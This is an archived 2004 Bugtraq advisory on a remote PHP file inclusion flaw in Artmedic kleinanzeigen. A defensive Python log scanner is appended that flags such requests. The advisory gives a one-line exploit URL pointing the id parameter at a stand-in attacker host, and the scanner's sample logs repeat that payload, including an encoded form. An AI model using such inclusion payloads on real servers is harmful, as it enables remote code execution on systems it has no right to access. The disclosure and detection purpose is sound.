[35796] in bugtraq


Artmedic kleinanzeigen include vulnerability

daemon@ATHENA.MIT.EDU (Francisco Alisson)
Tue Jul 20 00:52:44 2004

Date: 19 Jul 2004 02:25:16 -0000
Message-ID: <20040719022516.2838.qmail@www.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: Francisco Alisson <dominusvis@click21.com.br>
To: bugtraq@securityfocus.com



Artmedic kleinanzeigen allows code inclusion in index.php.
 
Exploit: 
www.host.com/artmedic-kleinanzeigen-path/index.php?id=http://evil-host.com 
 
An evil attacker could use this vulnerability to execute
PHP code with the same user id as the running server.
 
Thanks and sorry for the bad English
Dominus_Vis from Infektion Group :> 
irc.phey.net -j #infektion 
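
For defenders reviewing web server logs, the following is an added example, not part of the original post or of the Artmedic code: it flags requests to index.php whose id parameter decodes to a remote location, including repeated percent-encoding. The log format (common/combined), the install path and all sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request target inside a common/combined log format entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Value that begins with a URL scheme, is protocol-relative, or is a UNC path.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*:|//|\\\\)', re.I)

# Constructed sample lines (hosts, paths and addresses are made up).
SAMPLE_LOG = [
    '192.0.2.10 - - [20/Jul/2004:00:52:44 +0000] "GET /kleinanzeigen/index.php?id=17 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [20/Jul/2004:00:53:01 +0000] "GET /kleinanzeigen/index.php?id=http://evil-host.example HTTP/1.1" 200 812',
    '198.51.100.7 - - [20/Jul/2004:00:53:09 +0000] "GET /kleinanzeigen/index.php?id=hTtP%253A%252F%252Fevil-host.example%252Fx HTTP/1.1" 200 812',
    '192.0.2.10 - - [20/Jul/2004:00:54:30 +0000] "GET /kleinanzeigen/search.php?id=http://evil-host.example HTTP/1.1" 404 210',
]

def decode_fully(value, rounds=3):
    """Undo repeated percent-encoding, bounded to a few rounds."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_id(log_line, script="index.php", param="id"):
    """Return the decoded parameter value if it points at a remote resource, else None."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    target = urlsplit(m.group(1))
    if not target.path.lower().endswith("/" + script):
        return None
    # parse_qs decodes once; decode_fully handles double encoding.
    for raw in parse_qs(target.query, keep_blank_values=True).get(param, []):
        value = decode_fully(raw)
        if REMOTE_RE.match(value):
            return value
    return None

def scan(lines):
    """Return (line_number, decoded_value) for every flagged line."""
    hits = []
    for n, line in enumerate(lines, 1):
        value = suspicious_id(line)
        if value is not None:
            hits.append((n, value))
    return hits

if __name__ == "__main__":
    for n, value in scan(SAMPLE_LOG):
        print(f"line {n}: remote include attempt, id={value!r}")
```

The scheme pattern is deliberately broad, so a legitimate id value containing a colon near the start would also be flagged and needs manual review.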
